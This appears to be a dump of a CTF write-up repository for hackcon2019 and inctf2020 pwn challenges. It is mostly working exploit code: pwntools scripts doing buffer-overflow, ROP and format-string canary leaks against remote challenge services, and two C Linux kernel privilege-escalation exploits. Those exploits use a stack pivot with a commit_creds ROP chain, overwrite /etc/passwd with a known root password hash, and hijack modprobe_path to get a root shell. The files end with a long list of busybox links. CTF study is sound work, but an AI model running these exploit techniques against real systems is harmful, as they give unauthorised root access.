-------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level ='critical' 4 | 5 | e = ELF('./q3') 6 | #p = process('./q3') 7 | p = remote('68.183.158.95',8991) 8 | p.recvuntil(': ',timeout=0.2) 9 | p.sendline('%3$p|%11$p') 10 | p.recvline() 11 | leak = p.recvline().strip().split('|') 12 | canary = int(leak[1],16) 13 | libc = int(leak[0],16)-0xf72b0-0x10 14 | print canary,hex(libc) 15 | payload = "A"*24+p64(canary)+"A"*8+p64(0x45216+libc) 16 | p.recvuntil(': ',timeout=1) 17 | p.sendline(payload) 18 | p.interactive() 19 | -------------------------------------------------------------------------------- /hackcon2019/pwn/Not_So_Easy_B0f/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/hackcon2019/pwn/Not_So_Easy_B0f/libc.so.6 -------------------------------------------------------------------------------- /hackcon2019/pwn/Not_So_Easy_B0f/q3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/hackcon2019/pwn/Not_So_Easy_B0f/q3 -------------------------------------------------------------------------------- /hackcon2019/pwn/babyb0f/README.md: -------------------------------------------------------------------------------- 1 | It's a b0f , Can't be easier than that. 2 | 3 | Service : nc 68.183.158.95 8989 4 | 5 | -------------------------------------------------------------------------------- /hackcon2019/pwn/babyb0f/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from pwn import * 3 | from time import sleep 4 | context(arch="amd64",os="linux") 5 | #p = process('./q1') 6 | p = remote('68.183.158.95',8989) 7 | libc = ELF('./libc.so.6') 8 | bin = ELF('./q1') 9 | puts_got = bin.got['puts'] 10 | puts_plt = bin.plt['puts'] 11 | payload = "A"*22 12 | payload += p64(bin.search(asm('pop rdi;ret')).next()) 13 | payload += p64(puts_got) 14 | payload += p64(puts_plt) 15 | payload += p64(bin.symbols['main']) 16 | sleep(1) 17 | log.success("sending payload") 18 | p.sendline(payload) 19 | p.recvuntil('Again\n',timeout=1) 20 | leak = u64(p.recvline().strip()+"\x00"*2) 21 | log.success("leaked puts at: "+hex(leak)) 22 | lba = leak - libc.symbols['puts'] 23 | log.success("libc base address calculated at: "+hex(lba)) 24 | sleep(1) 25 | payload = "A"*22 26 | payload += p64(0x45216+lba) #one_gadget 27 | p.sendline(payload) 28 | p.interactive() 29 | -------------------------------------------------------------------------------- /hackcon2019/pwn/babyb0f/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/hackcon2019/pwn/babyb0f/libc.so.6 -------------------------------------------------------------------------------- /hackcon2019/pwn/babyb0f/q1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/hackcon2019/pwn/babyb0f/q1 -------------------------------------------------------------------------------- /hackcon2019/pwn/babypwn/README.md: -------------------------------------------------------------------------------- 1 | You don't need eip control for every pwn. 2 | Service : nc 68.183.158.95 8990 3 | -------------------------------------------------------------------------------- /hackcon2019/pwn/babypwn/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #p = process('./q2') 4 | p = remote('68.183.158.95',8990) 5 | e = ELF('./q2') 6 | 7 | win = e.symbols['win'] 8 | payload = p64(win)+p64(0xFFFFFFFE00000000)+"\n"*6 9 | p.sendline(payload) 10 | p.interactive() 11 | -------------------------------------------------------------------------------- /hackcon2019/pwn/babypwn/q2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/hackcon2019/pwn/babypwn/q2 -------------------------------------------------------------------------------- /inctf2020/Lab9/.gdb_history: -------------------------------------------------------------------------------- 1 | c 2 | p $rax 3 | add-symbol-file mod.ko 0xffffffffc0000000 4 | target remote 127.0.0.1:6789 5 | b device_ioctl 6 | c 7 | ni 8 | add-symbol-file mod.ko 0xffffffffc0000000 9 | target remote 127.0.0.1:6789 10 | b device_ioctl 11 | c 12 | ni 13 | p $rdi 14 | p $rax 15 | ni 16 | add-symbol-file mod.ko 0xffffffffc0000000 17 | target remote 127.0.0.1:6789 18 | b device_ioctl 19 | c 20 | c 21 | ni 22 | p $rdi 23 | ni 24 | p $rdi 25 | ni 26 | b*0xffffffffc00001c6 27 | delete breakpoints 28 | b*0xffffffffc00001c6 29 | p $rax 30 | x/xg 0xffff880006080480 31 | c 32 | add-symbol-file mod.ko 0xffffffffc0000000 33 | b*0xffffffffc00001c6 34 | add-symbol-file mod.ko 0xffffffffc0000000 35 | target remote 127.0.0.1:6789 36 | b device_ioctl 37 | c 38 | c 39 | delete breakpoints 40 | b*0xffffffffc00001c6 41 | c 42 | ni 43 | p $rax 44 | c 45 | ni 46 | p $rax 47 | c 48 | p $rax 49 | ni 50 | p $rax 51 | add-symbol-file mod.ko 0xffffffffc0000000 52 | target remote 127.0.0.1:6789 53 | b device_ioctl 54 | c 55 | ni 56 | ni 57 | ni 58 | p $rax 59 | add-symbol-file mod.ko 0xffffffffc0000000 60 | target remote 127.0.0.1:6789 61 | b device_ioctl 62 | c 63 | ni 64 | p $rdi 65 | p $rdi 66 | p $rsi 67 | si 68 | ni 69 | ni 70 | nx/xg $rdi 71 | x/xg $rdi 72 | ni 73 | ni 74 | p $rax 75 | ni 76 | p $rax 77 | x/xg $rbx 78 | add-symbol-file mod.ko 0xffffffffc0000000 79 | target remote 127.0.0.1:6789 80 | b device_ioctl 81 | c 82 | ni 83 | b*0xffffffffc00002de 84 | c 85 | c 86 | c 87 | c 88 | c 89 | ni 90 | ni 91 | p $esi 92 | ni 93 | c 94 | p $esi 95 | c 96 | p $esi 97 | ni 98 | p $esi 99 | ni 100 | p $rdi 101 | ni 102 | x/xg 0xffffc900000cfe60 103 | c 104 | ni 105 | p $rsi 106 | p $rax 107 | target remote 127.0.0.1:6789 108 | add-symbol-file mod.ko 0xffffffffc0000000 109 | target remote 127.0.0.1:6789 110 | add-symbol-file mod.ko 0xffffffffc0000000 111 | b device_ioctl 112 | c 113 | ni 114 | ni 115 | p $rax 116 | ni 117 | ni 118 | x/xg $rdi 119 | x/xg $rdx 120 | target remote 127.0.0.1:6789 121 | add-symbol-file mod.ko 0xffffffffc0000000 122 | b device_mmap 123 | c 124 | p $rdi 125 | c 126 | add-symbol-file mod.ko 0xffffffffc0000000 127 | target remote 127.0.0.1:6789 128 | b device_mmap 129 | c 130 | ni 131 | ni 132 | p $rdi 133 | ni 134 | ni 135 | p $r8 136 | p $rsi 137 | ni 138 | add-symbol-file mod.ko 0xffffffffc0000000 139 | target remote 127.0.0.1:6789 140 | b device_mmap 141 | c 142 | ni 143 | p $rcx 144 | p $r9 145 | ni 146 | p $rxc 147 | p $rxc 148 | p $rcx 149 | p $rax 150 | ni 151 | p $rax 152 | p $rsi 153 | x/xg $rdx 154 | set $rsi=0x2000 155 | ni 156 | c 157 | add-symbol-file mod.ko 0xffffffffc0000000 158 | target remote 127.0.0.1:6789 159 | b device_mmap 160 | c 161 | ni 162 | p $rdx 163 | x/xg 0xffff8800060808e0 164 | p 0x0000000000003338 ^ 0x2000 165 | add-symbol-file mod.ko 0xffffffffc0000000 166 | target remote 127.0.0.1:6789 167 | b*ffffffff813fe7f0 168 | b*0xffffffff813fe7f0 169 | c 170 | p $rdi 171 | x/8gx 0xffff8800072b3800 172 | x/i 0xffff8800072b3800 173 | x/xg 0xffff8800072b3800 174 | x/i 0xffffffff81a5f260 175 | x/xg 0xffffffff81a5f260 176 | x/8gx 0xffff8800072b3800 177 | ls 178 | add-symbol-file mod.ko 0xffffffffc0000000 179 | target remote 127.0.0.1:6789 180 | b*0xffffffff813fe7f0 181 | c 182 | p $rdi 183 | p $rsi 184 | p $rdx 185 | p $rdi 186 | x/8xg 0xffff8800072b3800 187 | x/16gx 0xffffffff81a5f260 188 | add-symbol-file mod.ko 0xffffffffc0000000 189 | target remote 127.0.0.1:6789 190 | b*0xffffffffaa9fe7f0 191 | x/xg 0xffffffffaa9fe7f0 192 | c 193 | p $rdi 194 | x/8gx 0xffff9034460da000 195 | vmmap 196 | x//i 0xffffffff818e7bdb 197 | x/i 0xffffffff818e7bdb 198 | p 0xffffffff818e7bdb-0xffffffff81000000 199 | p shell 200 | add-symbol-file mod.ko 0xffffffffc0000000 201 | add-symbol-file mod.ko 0xffffffffc0000000 202 | target remote 127.0.0.1:6789 203 | x/i 0xffffffffbbae7bdb 204 | b*0xffffffffbbae7bdb 205 | c 206 | si 207 | p $rsp 208 | x/xg 0xf6000000 209 | vmmap 210 | add-symbol-file mod.ko 0xffffffffc0000000 211 | target remote 127.0.0.1:6789 212 | b*0xffffffffb04e7bdb 213 | c 214 | si 215 | add-symbol-file mod.ko 0xffffffffc0000000 216 | target remote 127.0.0.1:6789 217 | b*0xffffffffa20e7bdb 218 | c 219 | si 220 | c 221 | x/i 0xffffffff813707e8 222 | add-symbol-file mod.ko 0xffffffffc0000000 223 | target remote 127.0.0.1:6789 224 | b*0xffffffffb84e7bdb 225 | c 226 | c 227 | add-symbol-file mod.ko 0xffffffffc0000000 228 | target remote 127.0.0.1:6789 229 | b*0xffffffff9e2e7bdb 230 | c 231 | si 232 | finish 233 | p $rdi 234 | p $rax 235 | si 236 | finish 237 | si 238 | p $rdi 239 | p $rdx 240 | si 241 | si 242 | p $rdx 243 | x/i 0xffffffff813707eb: 244 | x/i 0xffffffff813707eb 245 | add-symbol-file mod.ko 0xffffffffc0000000 246 | target remote 127.0.0.1:6789 247 | add-symbol-file mod.ko 0xffffffffc0000000 248 | target remote 127.0.0.1:6789 249 | target remote 127.0.0.1:6789 250 | target remote 127.0.0.1:6789 251 | x/i 0xffffffff98740967 252 | searchmem /sbin/modprobe 253 | vmmap 254 | searchmem /sbin/modprobe 0xffffffff81967b20 255 | searchmem /sbin/modprobe 0xffffffff81a00000 256 | searchmem /sbin/modprobe 0xffffffff81a00000 0xffffffff8215c000 257 | -------------------------------------------------------------------------------- /inctf2020/Lab9/add.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | cd fs 3 | cp ../$1 . 4 | find . -print0 | cpio --null -ov --format=newc > ../rootfs.cpio 5 | -------------------------------------------------------------------------------- /inctf2020/Lab9/bzImage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/inctf2020/Lab9/bzImage -------------------------------------------------------------------------------- /inctf2020/Lab9/exploit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/inctf2020/Lab9/exploit -------------------------------------------------------------------------------- /inctf2020/Lab9/exploit.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | #define ull unsigned long long 14 | #define LOCK_BOX 0x1337 15 | #define UNLOCK_BOX 0x1338 16 | #define SET_BOX 0x1339 17 | #define RESIZE_BOX 0x133a 18 | #define box_unlock() box_lock() 19 | #define sBox struct box 20 | #define commit_creds kbase + 0x80010 21 | #define prepare_kernel_cred kbase + 0x803e0 22 | #define stack_pivot_gadget kbase + 0x8e7bdb 23 | // mov esp,0xf6000000; ret 24 | #define pop_rdi_ret kbase + 0x3707ec 25 | #define pop_rdx_rdi_ret kbase + 0x3707eb 26 | #define pop_rsi_ret kbase + 0x1f1b5 27 | #define mov_rdi_rax kbase + 0x8e21c 28 | #define fchmodat kbase + 0x190cc0 29 | #define msleep kbase + 0xbc9e0 30 | 31 | 32 | struct box { 33 | uint64_t size; 34 | uint64_t key; 35 | void * ptr; 36 | } Box; 37 | 38 | int fd; 39 | 40 | int box_lock() 41 | { 42 | return ioctl(fd, LOCK_BOX, &Box.key); 43 | } 44 | 45 | int box_set(ull key) 46 | { 47 | Box.key = key; 48 | return ioctl(fd, SET_BOX, &Box.key); 49 | } 50 | 51 | int box_resize(uint64_t size) 52 | { 53 | Box.size = size; 54 | return ioctl(fd, RESIZE_BOX, &Box.size); 55 | } 56 | 57 | void * dev_mmap(void * addr, uint64_t size) 58 | { 59 | void * _addr = mmap(addr, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); 60 | return _addr; 61 | } 62 | 63 | void shell() 64 | { 65 | puts("[+] Waiting"); 66 | sleep(5); 67 | char * passwd = "root:6yJpcMmL6GY4c:0:0:root:/root:/bin/sh\nuser:x:1000:1000:Linux User,,,:/home/user:/bin/sh"; 68 | int pfd = open("/etc/passwd", O_WRONLY); 69 | write(pfd, passwd, strlen(passwd)); 70 | close(pfd); 71 | puts("[+] Login with password: toor"); 72 | system("/bin/sh"); 73 | } 74 | char * fake_stack = NULL; 75 | void exploit() 76 | { 77 | pthread_t p_thread; 78 | box_set(0x2000); 79 | int ptmx[0x30]; 80 | for(int i=0;i<0x30;++i) 81 | ptmx[i] = open("/dev/ptmx", O_RDWR|O_NOCTTY); 82 | for(int i=0;i<3;++i) 83 | box_resize(24); 84 | int fds[0x20]; 85 | int bak = fd; 86 | for(int i=0;i<0x20;++i) 87 | { 88 | fds[i] = open("/dev/mod", O_RDWR); 89 | fd = fds[i]; 90 | box_set(0x1337+i); 91 | box_resize(0x400); 92 | } 93 | fd = bak; 94 | Box.key = 0x2000; 95 | ull * addr = 0x13370000LL; 96 | box_lock(); 97 | for(int i=0;i<0x20;++i) 98 | { 99 | fd = fds[i]; 100 | Box.key = 0x1337+i; 101 | if(box_lock() == -1) 102 | { 103 | box_unlock(); 104 | printf("Found at idx: %d\n", i); 105 | dev_mmap(0x13370000LL, 0x2000); 106 | fd = bak; 107 | Box.key = 0x2000; 108 | box_unlock(); 109 | break; 110 | } 111 | box_unlock(); 112 | } 113 | 114 | ull ptm_ops = NULL; 115 | int i; 116 | for(i=0;i<0x2000/8;++i) 117 | { 118 | if((addr[i] & 0xffff) == 0xf260) 119 | { 120 | ptm_ops = addr[i]; 121 | break; 122 | } 123 | } 124 | if(!ptm_ops) 125 | { 126 | puts("Run again"); 127 | exit(1); 128 | } 129 | pthread_create(&p_thread, NULL, shell, NULL); 130 | ull kbase = ptm_ops - 0xa5f260; 131 | printf("[+] kernel base: %p\n", kbase); 132 | int idx = 0; 133 | ull * ropchain = 0xf6000000; 134 | char *file = "/etc/passwd"; 135 | ropchain[idx++] = pop_rdi_ret; 136 | ropchain[idx++] = 0; 137 | ropchain[idx++] = prepare_kernel_cred; 138 | ropchain[idx++] = mov_rdi_rax; 139 | ropchain[idx++] = commit_creds; 140 | ropchain[idx++] = pop_rdx_rdi_ret; 141 | ropchain[idx++] = 0777; 142 | ropchain[idx++] = 0; 143 | ropchain[idx++] = pop_rsi_ret; 144 | ropchain[idx++] = file; 145 | ropchain[idx++] = fchmodat; 146 | ropchain[idx++] = pop_rdi_ret; 147 | ropchain[idx++] = 0x100000; 148 | ropchain[idx++] = msleep; 149 | ull * fake_ops = malloc(0x400); 150 | memset((void *)fake_ops, 0, 0x400); 151 | fake_ops[12] = stack_pivot_gadget; // ptm_unix98_ops.ioctl 152 | addr[i] = (void *)fake_ops; 153 | for(int i=0;i<0x30;++i) 154 | ioctl(ptmx[i], 0xdeadbeef, 0xdeadbeef); 155 | } 156 | 157 | int main() { 158 | fd = open("/dev/mod", O_RDWR); 159 | assert(fd > 0); 160 | fake_stack = mmap(0xf6000000-0x50000, 0x100000, 0x7, 0x32 | MAP_POPULATE | MAP_FIXED | MAP_GROWSDOWN, -1, 0); 161 | exploit(); 162 | close(fd); 163 | } 164 | -------------------------------------------------------------------------------- /inctf2020/Lab9/exploit_modprobe_path: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/inctf2020/Lab9/exploit_modprobe_path -------------------------------------------------------------------------------- /inctf2020/Lab9/exploit_modprobe_path.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #define ull unsigned long long 13 | #define LOCK_BOX 0x1337 14 | #define UNLOCK_BOX 0x1338 15 | #define SET_BOX 0x1339 16 | #define RESIZE_BOX 0x133a 17 | #define box_unlock() box_lock() 18 | #define sBox struct box 19 | #define commit_creds kbase + 0x80010 20 | #define prepare_kernel_cred kbase + 0x803e0 21 | #define stack_pivot_gadget kbase + 0x8e7bdb 22 | // mov esp,0xf6000000; ret 23 | #define pop_rdi_ret kbase + 0x3707ec 24 | #define pop_rdx_rdi_ret kbase + 0x3707eb 25 | #define pop_rsi_ret kbase + 0x1f1b5 26 | #define mov_rdi_rax kbase + 0x8e21c 27 | #define fchmodat kbase + 0x190cc0 28 | #define msleep kbase + 0xbc9e0 29 | #define modprobe_path kbase + 0xe42a00 30 | #define mov_qword_rdx_rsi kbase + 0x340967 31 | 32 | struct box { 33 | uint64_t size; 34 | uint64_t key; 35 | void * ptr; 36 | } Box; 37 | 38 | int fd; 39 | 40 | int box_lock() 41 | { 42 | return ioctl(fd, LOCK_BOX, &Box.key); 43 | } 44 | 45 | int box_set(ull key) 46 | { 47 | Box.key = key; 48 | return ioctl(fd, SET_BOX, &Box.key); 49 | } 50 | 51 | int box_resize(uint64_t size) 52 | { 53 | Box.size = size; 54 | return ioctl(fd, RESIZE_BOX, &Box.size); 55 | } 56 | 57 | void * dev_mmap(void * addr, uint64_t size) 58 | { 59 | void * _addr = mmap(addr, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); 60 | return _addr; 61 | } 62 | 63 | 64 | void shell() 65 | { 66 | puts("[+] r00000t"); 67 | system("echo '#!/bin/sh' > /home/user/x; echo 'setsid cttyhack setuidgid 0 /bin/sh' >> /home/user/x"); 68 | system("chmod +x /home/user/x"); 69 | int ff = open("/home/user/ffff", O_WRONLY|O_CREAT); 70 | write(ff, "\xff\xff\xff\xff", 4); 71 | close(ff); 72 | system("chmod 777 /home/user/ffff; /home/user/ffff"); 73 | system("sh"); 74 | } 75 | 76 | void exploit() 77 | { 78 | pthread_t p_thread; 79 | box_set(0x2000); 80 | int ptmx[0x30]; 81 | for(int i=0;i<0x30;++i) 82 | ptmx[i] = open("/dev/ptmx", O_RDWR|O_NOCTTY); 83 | for(int i=0;i<3;++i) 84 | box_resize(24); 85 | int fds[0x20]; 86 | int bak = fd; 87 | for(int i=0;i<0x20;++i) 88 | { 89 | fds[i] = open("/dev/mod", O_RDWR); 90 | fd = fds[i]; 91 | box_set(0x1337+i); 92 | box_resize(0x400); 93 | } 94 | fd = bak; 95 | Box.key = 0x2000; 96 | ull * addr = 0x13370000LL; 97 | box_lock(); 98 | for(int i=0;i<0x20;++i) 99 | { 100 | fd = fds[i]; 101 | Box.key = 0x1337+i; 102 | if(box_lock() == -1) 103 | { 104 | box_unlock(); 105 | printf("Found at idx: %d\n", i); 106 | dev_mmap(0x13370000LL, 0x2000); 107 | fd = bak; 108 | Box.key = 0x2000; 109 | box_unlock(); 110 | break; 111 | } 112 | box_unlock(); 113 | } 114 | 115 | ull ptm_ops = NULL; 116 | int i; 117 | for(i=0;i<0x2000/8;++i) 118 | { 119 | if((addr[i] & 0xffff) == 0xf260) 120 | { 121 | ptm_ops = addr[i]; 122 | break; 123 | } 124 | } 125 | if(!ptm_ops) 126 | { 127 | puts("Run again"); 128 | exit(1); 129 | } 130 | ull kbase = ptm_ops - 0xa5f260; 131 | printf("[+] kernel base: %p\n", kbase); 132 | ull * fake_ops = malloc(0x400); 133 | memset((void *)fake_ops, 0, 0x400); 134 | fake_ops[12] = mov_qword_rdx_rsi; // ptm_unix98_ops.ioctl 135 | addr[i] = (void *)fake_ops; 136 | for(int idx=0;idx<0x30;++idx) 137 | { 138 | ioctl(ptmx[idx], 0x6d6f682f, modprobe_path); 139 | ioctl(ptmx[idx], 0x73752f65, modprobe_path+4); 140 | ioctl(ptmx[idx], 0x782f7265, modprobe_path+8); 141 | } 142 | addr[i] = ptm_ops; 143 | shell(); 144 | } 145 | 146 | int main() { 147 | fd = open("/dev/mod", O_RDWR); 148 | assert(fd > 0); 149 | exploit(); 150 | close(fd); 151 | } 152 | -------------------------------------------------------------------------------- /inctf2020/Lab9/extract-vmlinux: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # SPDX-License-Identifier: GPL-2.0-only 3 | # ---------------------------------------------------------------------- 4 | # extract-vmlinux - Extract uncompressed vmlinux from a kernel image 5 | # 6 | # Inspired from extract-ikconfig 7 | # (c) 2009,2010 Dick Streefland 8 | # 9 | # (c) 2011 Corentin Chary 10 | # 11 | # ---------------------------------------------------------------------- 12 | 13 | check_vmlinux() 14 | { 15 | # Use readelf to check if it's a valid ELF 16 | # TODO: find a better to way to check that it's really vmlinux 17 | # and not just an elf 18 | readelf -h $1 > /dev/null 2>&1 || return 1 19 | 20 | cat $1 21 | exit 0 22 | } 23 | 24 | try_decompress() 25 | { 26 | # The obscure use of the "tr" filter is to work around older versions of 27 | # "grep" that report the byte offset of the line instead of the pattern. 28 | 29 | # Try to find the header ($1) and decompress from here 30 | for pos in `tr "$1\n$2" "\n$2=" < "$img" | grep -abo "^$2"` 31 | do 32 | pos=${pos%%:*} 33 | tail -c+$pos "$img" | $3 > $tmp 2> /dev/null 34 | check_vmlinux $tmp 35 | done 36 | } 37 | 38 | # Check invocation: 39 | me=${0##*/} 40 | img=$1 41 | if [ $# -ne 1 -o ! -s "$img" ] 42 | then 43 | echo "Usage: $me " >&2 44 | exit 2 45 | fi 46 | 47 | # Prepare temp files: 48 | tmp=$(mktemp /tmp/vmlinux-XXX) 49 | trap "rm -f $tmp" 0 50 | 51 | # That didn't work, so retry after decompression. 52 | try_decompress '\037\213\010' xy gunzip 53 | try_decompress '\3757zXZ\000' abcde unxz 54 | try_decompress 'BZh' xy bunzip2 55 | try_decompress '\135\0\0\0' xxx unlzma 56 | try_decompress '\211\114\132' xy 'lzop -d' 57 | try_decompress '\002!L\030' xxx 'lz4 -d' 58 | try_decompress '(\265/\375' xxx unzstd 59 | 60 | # Finally check for uncompressed images or objects: 61 | check_vmlinux $img 62 | 63 | # Bail out: 64 | echo "$me: Cannot find vmlinux." >&2 65 | -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/[: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/[[: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/acpid: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/add-shell: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/addgroup: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/adduser: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/adjtimex: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/arp: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/arping: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ash: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/awk: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/base64: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/basename: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/beep: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/blkid: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/blockdev: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/bootchartd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/brctl: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/bunzip2: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/busybox: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/inctf2020/Lab9/fs/bin/busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/bzcat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/bzip2: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/cal: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/cat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/catv: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chattr: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chgrp: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chmod: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chown: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chpasswd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chpst: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chroot: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chrt: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chvt: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/cksum: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/clear: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/cmp: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/comm: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/conspy: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/cp: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/cpio: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/crond: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/crontab: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/cryptpw: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/cttyhack: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/cut: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/date: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dc: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/deallocvt: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/delgroup: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/deluser: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/depmod: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/devmem: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/df: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dhcprelay: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/diff: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dirname: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dmesg: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dnsd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dnsdomainname: -------------------------------------------------------------------------------- 1 | 